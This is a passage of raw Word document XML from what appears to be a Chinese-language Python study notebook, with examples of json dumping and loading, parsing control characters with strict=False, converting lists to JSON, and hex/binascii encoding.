          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484FB455" w14:textId="77777777" w:rsidR="006510CF" w:rsidRDefault="006510CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3A6B62" w14:textId="3E972ABF" w:rsidR="006510CF" w:rsidRDefault="006510CF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>导出为</w:t>
      </w:r>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00393565">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件或字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE148E6" w14:textId="3291BC6F" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json.dump(</w:t>
      </w:r>
      <w:r w:rsidR="006510CF">
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidR="006510CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串，导出句柄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B681B5" w14:textId="4A9CBA85" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json.dumps(</w:t>
      </w:r>
      <w:r w:rsidR="006510CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r w:rsidR="006510CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649860B" w14:textId="2A169285" w:rsidR="001E442B" w:rsidRDefault="001E442B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFFC079" w14:textId="79F9A69A" w:rsidR="001E442B" w:rsidRDefault="001E442B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529AFB28" w14:textId="463C9AF4" w:rsidR="004C452C" w:rsidRDefault="001E442B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E442B">
        <w:t>json.dump(openai.Model.list(), open("openaiModelList.json",'w'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA217DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B79FCBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with open(xx) as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E17969" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.load(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB8510" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092CA170" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103A0B60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="506" w:name="_Toc159779946"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许解析控制字符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w14:paraId="1DD31282" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579B448" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://bobbyhadz.com/blog/python-json-decoder-jsondecodeerror-invalid-control-character-at#:~:text=The%20Python%20%22json.,in%20the%20call%20to%20json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69060AB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D50EA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FFB27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B72E2E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>my_json_str = '{"name": "Alice Smith"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176B82B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 👇️ set strict to False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628408B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>result = json.loads(my_json_str, strict=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F05B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(result)  # 👉️ {'name': 'Alice Smith'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389AD78E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274C4485" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Control characters are those with character codes in the 0-31 range, e.g. \t, \n, \r, \0, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED654E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="_Toc159779947"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串前面加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许解析控制字符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w14:paraId="355423A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>raw_req = r"""{"query":"query goodbye {\n    goodbye \n}"}"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E867A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r = json.loads(raw_req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC5A8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: {'query': 'query goodbye {\n    goodbye \n}'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A2BE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C26F72" w14:textId="4D00B587" w:rsidR="004C452C" w:rsidRDefault="006A0911" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="508" w:name="_Toc159779948"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:p w14:paraId="79230651" w14:textId="77777777" w:rsidR="006A0911" w:rsidRDefault="006A0911" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460C328E" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00942989">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC3DDD" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DE2B8A" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设我们有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D392853" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00942989">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>list_data = ['Apple', 'Banana', 'Cherry']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886458A" w14:textId="19B9B1B0" w:rsidR="00492A80" w:rsidRDefault="00492A80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或者再复杂一些都可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75675560" w14:textId="77777777" w:rsidR="00492A80" w:rsidRPr="00492A80" w:rsidRDefault="00492A80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00492A80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>list_data = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18433744" w14:textId="77777777" w:rsidR="00492A80" w:rsidRPr="00492A80" w:rsidRDefault="00492A80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00492A80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"name": "Apple", "color": "Red"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ABFB0D" w14:textId="77777777" w:rsidR="00492A80" w:rsidRPr="00492A80" w:rsidRDefault="00492A80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00492A80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"name": "Banana", "color": "Yellow"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB0947" w14:textId="77777777" w:rsidR="00492A80" w:rsidRPr="00492A80" w:rsidRDefault="00492A80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00492A80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    {"name": "Cherry", "color": "Red"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22178BF6" w14:textId="7EB312ED" w:rsidR="00492A80" w:rsidRDefault="00492A80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00492A80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CCADCD" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B346D6A" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.dumps() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将列表转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45562A1D" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00942989">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json_data = json.dumps(list_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A73A1" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(json_data)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ["Apple", "Banana", "Cherry"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615299D7" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E4A958" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> json.loads() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的字符串转换回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37415F73" w14:textId="77777777" w:rsidR="0042440A" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F136D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>list_data2 = json.loads(json_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB078B" w14:textId="61F78762" w:rsidR="006A0911" w:rsidRDefault="0042440A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(list_data2)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ['Apple', 'Banana', 'Cherry']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0B59C" w14:textId="77777777" w:rsidR="006A0911" w:rsidRDefault="006A0911" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E8DF16" w14:textId="6A855129" w:rsidR="00244F7B" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="_Toc159779949"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串的编码解码：如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p w14:paraId="6CC7BB52" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1489D782" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178947D4" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; a = 'aabbccddeeff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08955C12" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; a_bytes = a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80ECB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.decode('hex')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9E006" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; print(a_bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61143CF0" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>b'\xaa\xbb\xcc\xdd\xee\xff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072BF91" w14:textId="77777777" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; aa = a_bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80ECB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.encode('hex')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FC439" w14:textId="2D2C0B99" w:rsidR="00C80ECB" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; print(aa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE80DA" w14:textId="22C786EC" w:rsidR="00C80ECB" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="510" w:name="_Toc159779950"/>
      <w:r w:rsidRPr="00DD3742">
        <w:t>binascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：对现有字符串编码解码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p w14:paraId="18137075" w14:textId="389AE688" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="511" w:name="_Toc159779951"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码解码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w14:paraId="412309E6" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import binascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783FA6F3" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF4B5C8" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>hex_string = "29cd7489b0a30e28fb589377"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE9D17" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670D3041" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
